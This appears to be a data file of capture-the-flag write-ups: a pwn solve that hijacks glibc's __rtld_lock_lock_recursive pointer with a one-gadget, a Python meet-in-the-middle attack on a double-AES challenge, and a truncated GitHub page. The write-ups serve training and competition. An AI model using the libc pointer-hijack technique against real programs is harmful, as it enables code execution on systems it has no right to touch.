text_chunk
stringlengths 151
703k
|
---|
# write ?pt ?solves
## TLDR* overwrite function pointer in libc * \_\_rtld\_lock\_lock\_recursive
## Challenge### Descriptionresult of file command* Arch : x86-64* Library : Dynamically linked* Symbol : Not stripped
result of checksec* RELRO : Full RELRO* Canary : Disable* NX : Enable* PIE : Enable
libc version: 2.27 (distributed with binary)### Exploit In this binary, we can overwrite arbitary value in any address repeatedlly. Furthermore, we are given the address of puts in libc and stack pointer(rbp-0x18 in main). But PIE and Full RELRO is enable, so we don't know any address in binary and we can't overwrite the global offset table. And execution flow is ended with exit() in main, so we can't make ROP chain. What should I do??
I overwrote the pointer of \_\_rtld\_lock\_lock\_recursive in libc to one-gadget RCE. I found that gadget by rp++ with option -l1(offset 0xe569f). This gadget always sucesses in this enviroment (in \_\_rtld\_lock\_lock\_recursive). (I had heard this technique from @ptrYudai. Thanks:) )
So I overwrote memory only one time and got flag.
My exploit code is [solve.py](https://github.com/kam1tsur3/2020_CTF/blob/master/bytebandits/pwn/write/solve.py).
## Referencehttps://code.woboq.org/userspace/glibc/elf/dl-fini.c.html#53 |
From the given source, we know that 2 encryptions with 3 signs out of string.printable are performed, which has 100 members. So brute forcing all double-encryption-combinations would take 100^3^2 units of time. Or 10^12.
Luckily wew can try to encrypt the known plaintext `aaaaaaaaaaaaaaaa` and decrypt the known ciphertext `ef92fab38516aa95fdc53c2eb7e8fe1d5e12288fdc9d026e30469f38ca87c305ef92fab38516aa95fdc53c2eb7e8fe1d5e12288fdc9d026e30469f38ca87c305` and if these match, we found a pair of 1st and 2nd keys that result in the correct encryption.
Then we only have to decrypt the flag with the 2nd and then with the 1st.
The keys were `"0000000000000t\r["` and `}=v0000000000000`
# Solver source code```python#!/usr/bin/python3
from string import printableimport itertoolsfrom Crypto.Cipher import AESfrom binascii import hexlify, unhexlify
pt = hexlify(b"aaaaaaaaaaaaaaaa")target = unhexlify(b"ef92fab38516aa95fdc53c2eb7e8fe1d5e12288fdc9d026e30469f38ca87c305ef92fab38516aa95fdc53c2eb7e8fe1d5e12288fdc9d026e30469f38ca87c305")lookup_table = {}
# create all 100^3 forward-encryption-optionsfor p1 in itertools.product(printable, repeat=3): key = "".join(p1) key1 = "0000000000000"+key
cipher1 = AES.new(key=key1.encode("utf-8"), mode=AES.MODE_ECB) c1 = hexlify(cipher1.encrypt(pt)) lookup_table[c1] = key1
print("done creating lookup table")
# create all 100^3 backward-encryption-optionsfor p2 in itertools.product(printable, repeat=3): key = "".join(p2) key2 = key+"0000000000000"
cipher2 = AES.new(key=key2.encode("utf-8"), mode=AES.MODE_ECB) c2 = cipher2.decrypt(target) if c2 in lookup_table: # check if the decryption of target == encryption of known plaintext key1 = lookup_table[c2] print(key1, key2) break
# part 2: decryptionflag = b"fa364f11360cef2550bd9426948af22919f8bdf4903ee561ba3d9b9c7daba4e759268b5b5b4ea2589af3cf4abe6f9ae7e33c84e73a9c1630a25752ad2a984abfbbfaca24f7c0b4313e87e396f2bf5ae56ee99bb03c2ffdf67072e1dc98f9ef691db700d73f85f57ebd84f5c1711a28d1a50787d6e1b5e726bc50db5a3694f576"flag = unhexlify(flag)
for key in [key2, key1]: cipher = AES.new(key=key.encode("utf-8"), mode=AES.MODE_ECB) flag = unhexlify(cipher.decrypt(flag)) print(flag)
# key1 = "0000000000000t\r["# key2 = "}=v0000000000000"``` |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf-writeups/Hack Zone Tunisia 2020/pwn/pwn3 at master · KEERRO/ctf-writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="C15C:F966:155A107:15E75FB:6412213C" data-pjax-transient="true"/><meta name="html-safe-nonce" content="4d53b86776e85e2a6b96870beeed22cc5a26fd47b3d17b4b58851746a765aef5" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDMTVDOkY5NjY6MTU1QTEwNzoxNUU3NUZCOjY0MTIyMTNDIiwidmlzaXRvcl9pZCI6Ijg5NzE1MjkzNTk3NTMwOTM0MzYiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="67c17e892d4e60cf67b0913e58dadf9c7b422166219aedd32afb542eee442f48" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:162845937" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf-writeups/Hack Zone Tunisia 2020/pwn/pwn3 at master · KEERRO/ctf-writeups" /><meta name="twitter:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta property="og:image:alt" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf-writeups/Hack Zone Tunisia 2020/pwn/pwn3 at master · KEERRO/ctf-writeups" /><meta property="og:url" content="https://github.com/KEERRO/ctf-writeups" /><meta property="og:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/KEERRO/ctf-writeups git https://github.com/KEERRO/ctf-writeups.git">
<meta name="octolytics-dimension-user_id" content="46076094" /><meta name="octolytics-dimension-user_login" content="KEERRO" /><meta name="octolytics-dimension-repository_id" content="162845937" /><meta name="octolytics-dimension-repository_nwo" content="KEERRO/ctf-writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="162845937" /><meta name="octolytics-dimension-repository_network_root_nwo" content="KEERRO/ctf-writeups" />
<link rel="canonical" href="https://github.com/KEERRO/ctf-writeups/tree/master/Hack%20Zone%20Tunisia%202020/pwn/pwn3" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
